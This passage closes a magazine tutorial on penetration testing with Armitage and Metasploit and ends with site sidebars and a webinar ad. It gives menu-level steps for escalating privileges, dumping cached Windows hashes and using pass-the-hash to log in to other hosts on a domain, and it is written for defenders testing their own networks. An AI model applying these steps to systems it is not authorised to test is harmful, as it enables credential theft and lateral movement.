Live-Fire Security Testing with Armitage and Metasploit
After post-exploitation, you'll want to compromise more hosts. Pass the hash is a technique for further compromising a Windows network.
Windows hosts do not pass your network credentials in the clear. Rather, they use a challenge-response scheme to generate a hash. Windows uses this hash to authenticate you on the Active Directory domain. Windows hosts cache and re-use hashes to authenticate to other hosts on the network. This saves you the trouble of retyping your password when you access a file share. Attackers use stolen hashes to get access to other hosts on your active directory domain.
Dumping cached hashes requires local administrator access. Use Meterpreter→Access→Escalate Privileges to try several local exploits to increase your privileges. Go to Meterpreter→Access→Dump Hashes to steal the local cached credentials.
Now you need targets. Use the auxiliary/windows/smb/smb_version module to find other Windows hosts on the Active Directory domain.
Go to Attacks→Find Attacks to generate an Attack menu for each host. Highlight several Windows hosts, right-click, and use Attacks→smb→pass the hash. Armitage lets you choose which set of credentials to try. Pick a pair and click Launch. You've passed the hash. Each successful login will give you a Meterpreter session.
Patches exist for Metasploit's Windows privilege escalation exploits. Attackers who compromise a patched system don't have to stop though. They may scan for an unpatched host, exploit it and then carry out these steps.
Earlier, I defined a penetration test as a way to learn how attackers may get access to key systems and files. I suspect you did not find a working exploit for your key servers. Before you conclude your network penetration test, I'd like you to think like an attacker for a moment.
Attackers will use social engineering and client-side attacks to get a foothold. Attackers then will try to exploit a workstation to collect hashes. Using pass-the-hash, your patched Windows systems are no longer safe. What happens if attackers access your workstation, install a key logger and download your SSH keys? One vulnerable host can lead to a total compromise of your otherwise secure assets.
In this article, I've shown you the techniques attackers use against your network. You learned how to scan your network, exploit hosts and carry out post-exploitation actions. You also learned how to maneuver deeper into your network using the pass-the-hash technique. The next step is to apply what you have learned.
I recommend that you download the Metasploitable virtual machine. Metasploitable has many services you can exploit for shell access and information. Attack Metasploitable to become familiar with Armitage and Metasploit before you start your first penetration test.
BackTrack Linux: www.backtrack-linux.org
Documentation for Armitage: www.fastandeasyhacking.com
Metasploitable Virtual Machine: blog.metasploit.com/2010/05/introducing-metasploitable.html
Raphael Mudge is the developer of Armitage. He lives in Washington, DC. Contact him at www.hick.org/~raffi.
|Speed Up Your Web Site with Varnish||Jun 19, 2013|
|Non-Linux FOSS: libnotify, OS X Style||Jun 18, 2013|
|Containers—Not Virtual Machines—Are the Future Cloud||Jun 17, 2013|
|Lock-Free Multi-Producer Multi-Consumer Queue on Ring Buffer||Jun 12, 2013|
|Weechat, Irssi's Little Brother||Jun 11, 2013|
|One Tail Just Isn't Enough||Jun 07, 2013|
Free Webinar: Hadoop
How to Build an Optimal Hadoop Cluster to Store and Maintain Unlimited Amounts of Data Using Microservers
Realizing the promise of Apache® Hadoop® requires the effective deployment of compute, memory, storage and networking to achieve optimal results. With its flexibility and multitude of options, it is easy to over or under provision the server infrastructure, resulting in poor performance and high TCO. Join us for an in depth, technical discussion with industry experts from leading Hadoop and server companies who will provide insights into the key considerations for designing and deploying an optimal Hadoop cluster.
Some of key questions to be discussed are:
- What is the “typical” Hadoop cluster and what should be installed on the different machine types?
- Why should you consider the typical workload patterns when making your hardware decisions?
- Are all microservers created equal for Hadoop deployments?
- How do I plan for expansion if I require more compute, memory, storage or networking?